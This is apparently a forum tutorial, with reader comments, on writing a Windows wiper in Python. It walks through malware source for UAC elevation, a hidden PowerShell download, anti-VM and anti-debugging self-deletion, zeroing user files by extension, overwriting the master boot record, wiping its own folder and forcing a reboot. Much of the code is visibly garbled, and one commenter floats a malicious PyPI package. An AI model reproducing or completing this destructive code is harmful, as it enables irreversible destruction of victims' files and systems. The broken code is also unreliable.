Python and Malware: Writing a simple wiper malware


In this article, I’ll describe how to write a malware, Please notice this is not a “true” malware this is only has to show you the basics and even how easy to be written, Probably python is not the best choice at all, It’s an interpreted language and so it needs an interpreter to be executed so to write a malware probably other languages that can work to a lower level and that can be compiled are probably a better choice, malware is often designed to be small, stealthy, have low memory footprint, and use limited processing power, So it’s very common to see malware written in C & Assembly.


At first, I will show its code then I will describe generally how this malware works, code consisted of two components: we are talking only about windows, The techniques you gone see in this malware are taken from a public malware samples, I’ll leave all the links at the end of this article. The malware source code

The First function IsAdmin

def IsAdmin():
		return ctypes.windll.shell32.IsUserAnAdmin()
					return False

it checks if it has Administrator privileges, if it doesn’t it runs RunAsAdmin using the ShellExecute trick runas to elevate privileges, and exits immediately

def RunAsAdmin():
ctypes.windll.shell32.IsUserAnAdmin() or (ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1) > 32, sys.exit())


def Is64Bit():
	return platform.machine().endswith('64')

it just check if the current process is a 64-bit using platform lib this function it’s gone be called later in InstallPy to determine which version of python should be installed, a simple if statement.

os_p = 64
		if not Is64Bit():
			os_p = 32

IsOnline This function simply checks if the infected computer is online using the “request” lib to get an HTTP response If TRUE, pass if not, the program will delete it itself why? Desperate ways to avoid analysis and we don’t want to infect a dead computer :wink:

def IsOnline():
		x = requests.get('', verify=False)
			return True
					return False


IsPyExist Here am using os.path.exists to see if python path exist in infected computer this can be done also by using subprocess to execute powershell cmd to check the version of python this way we can tell if python is present on the infected computer or not.

    p =['powershell',
                        """$p = &{python -V} 2>&1;$version = if($p -is [System.Management.Automation.ErrorRecord]){$p.Exception.Message}; $p"""],
                       stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, startupinfo=startupinfo)
    return True
    for num in range(10, 45):
        if os.path.exists(f"C:/Users/{os.getlogin()}/Appdata/Local/Programs/Python/Python{num}/python.exe"):
            return True
            return False

InstallPy The goal of this function is to install Python on the infected machine. The key is that we are installing our interpreter using a language that is already built into Windows.

def InstallPy():
    os_p = 64
    if not Is64Bit():
        os_p = 32
    rand_py = f'python{random.randrange(111, 9999999)}.exe'
    url = "" if os_p == 64 else ""
        f"""powershell -ep Bypass -WindowStyle Hidden -Command "iwr -Uri {url} -OutFile c:/users/$env:username/appdata/local/temp/{rand_py}" """)
    if os.path.exists(f"c:/users/{os.getlogin()}/appdata/local/temp/{rand_py}"):
            f"c:/users/{os.getlogin()}/appdata/local/temp/{rand_py} /quiet InstallAllUsers=0 Include_launcher=0 PrependPath=1 Include_test=0")
    os.remove(f"c:/users/{os.getlogin()}/appdata/local/temp/{rand_py}")"python -m pip install --upgrade pip")"python -m pip install pyinstaller psutil")
    pip_list = RunPwsh("pip list")
    if 'psutil' in pip_list.lower():
        wait4 = os.system('msg %username% in!')"msg %username% finished")
    return True

PowerShell -WindowStyle Hidden will hide the window.
-ExecutionPolicy Bypass should already do the run as admin part
iwr -Uri Invoke-WebRequest It parses the response and returns collections of links,
The {url} will automatically download no need for user interaction -OutFile output python exe to temp directory under a random name using {rand_py}

I recommend this tutorial to better understand.


AntiVm the following Function will search for VM Processes, the Malware will self delete anytime detect a VM the code can’t detect hardware based VM’s (like Hyper-V that accelerates in hardware e.g github workflow VPS)

def AntiVm():
      Process = ["vmsrvc.exe" , "vmusrvc.exe", "vboxtray.exe", "vmtoolsd.exe", "df5serv.exe", "vboxservice.exe"]
      for process in psutil.process_iter():
         for i in Process:
            if i in
                return CommitSuicide()

isDebuggerPresent() function this is the most simplest anti-debugging technique From the MSDN’s documentation, we can see that it is a winapi function that take in no argument and return a non-zero if it detects a debugger (TRUE) or a zero which means it does not detect any debugger (FALSE) if the program retune (TRUE) the program will delete it itself

def AntiDebug():
    isDebuggerPresent = windll.kernel32.IsDebuggerPresent()
    if (isDebuggerPresent):
        return CommitSuicide() 
        return False

Stage 1 - Destroy files content

  • the wiper start by looking for folders that contained important files, like documents, downloads, pictures, music, and videos: more or less everything that a user might value. After the code found these folders, the wiping code overwrote their contents.

File Extension target list

            ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
			".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
			".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z",
			".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
			".gif", ".txt", ".jar", ".sql", ".bundle",
			".sqlite3", ".html", ".php", ".log", ".bak", ".deb"
def SetFiles():
				for dirpath, dirs, files in os.walk(f"C:\\Users\\{os.getlogin()}\\{os.getcwd()}"):
					for f in files:
						path = os.path.abspath(os.path.join(dirpath, f))
							if f.endswith(tuple(ext)):
								with open(f, "rb") as files:
									data =
								with open(f, "wb") as files:
									data.write(b'\x00') # Overwrites multiple files with zero bytes 

Stage 2 - Destroy MBR

  • The master boot record. The Master Boot Record is vital for a computer’s hard drive and it contains information about how to store files and what the computer should do when it starts up. Without the guidance of the master boot, it’s almost impossible for the machine to function properly
def OverWriteMBR():
	hDevice = Kernel32.CreateFileW("\\\\.\\PhysicalDrive0", 0x40000000, 0x00000001 | 0x00000002, None, 3, 0,0) 
		Kernel32.WriteFile(hDevice, Data, None)

Create a handle to our Physical Drive hDevice = Kernel32.CreateFileW("\\\\.\\PhysicalDrive0", 0x40000000, 0x00000001 | 0x00000002, None, 3, 0,0)
For overwriting the MBR Kernel32.WriteFile(hDevice, Data, None) and close the handle to our Physical Drive! Kernel32.CloseHandle(hDevice)

Stage 3 - Remove self

I found this function by reading the article self-destructing by @energywolf, it’s simple and pretty neat.

def CommitSuicide():
    file_path = os.path.abspath(__file__) 
    folder_path = os.path.dirname(file_path) 
    os.system("cipher /W:%s" % folder_path) # At the end of the script, the file is deleted & over-written

Stage 4 - Shut it down!

Finaly the infected system should reboot immediately

def SysDown():

# win32api.InitiateSystemShutdown(computername="",message="",timeOut=0, bForceclose=0,bRebootAfterShutdown=1)
	os.system("shutdown -t 0 -r -f ")


Vx-Underground Paper


Would like to rewrite this for linux.Would make an evil Pypi package…

1 Like

When I said simple, I mean super simple. It just has basic functionality

1 Like

Well written tutorial! I love the step-by-step approach you took.

Will definitely be using some of the snippets you provided at some point in time! :slight_smile:

1 Like